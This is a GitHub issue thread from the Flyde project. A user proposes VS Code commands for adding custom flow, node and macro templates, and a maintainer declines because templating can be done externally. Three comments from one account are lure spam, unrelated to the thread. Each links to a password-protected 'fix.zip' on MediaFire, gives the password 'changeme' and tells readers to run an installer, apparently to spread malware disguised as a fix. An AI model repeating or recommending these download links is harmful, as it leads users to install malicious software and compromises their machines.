### ISSUE TITLE
Function to add our own templates for the commands that create flows in Vscode

### ISSUE THREAD

**Issue by akim-muto** [flydelabs/flyde#139]
We discussed previously in the discord about creating the function to add our own templates for the commands that create flows in Vscode.
About it’s

functional overview
- Add custom node template
- Add macro node template
- Add git hub template repository
- For custom nodes, or macro nodes, analyze the folder used for the current workspace and clone the template repository in advance if necessary
- If you add a macro node template, add it to the entry to be compiled in webpack.config.js

Interactive execution by Vscode commands

1, Select the type of template to add
- normal flow
- custom
- macro
- github repository

2, For a custom node or macro node
- Input template repository URL for initialization

3, Enter the URL of the github repository to be used for the template

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GabiGrin** [comment]
@akim-muto would this solve a problem you have _today_?

**Comment by akim-muto** [comment]
As for me, I believe it will be resolved.

Is it not what you envisioned?
If you feel there is a problem, feel free to be more specific.

Even if you want to encourage spontaneous thinking, I need more information.

If you still don't feel the need to have it as a Flyde feature, then we have no desire to persuade you any more strongly than we already have.

**Comment by GabiGrin** [comment]
@akim-muto Flyde is a complex project, so I prefer adding features that solve a concrete user problem. Moreover, templating can be achieved via any external extension as Flyde is just text.

I appreciate the willingness to help though!
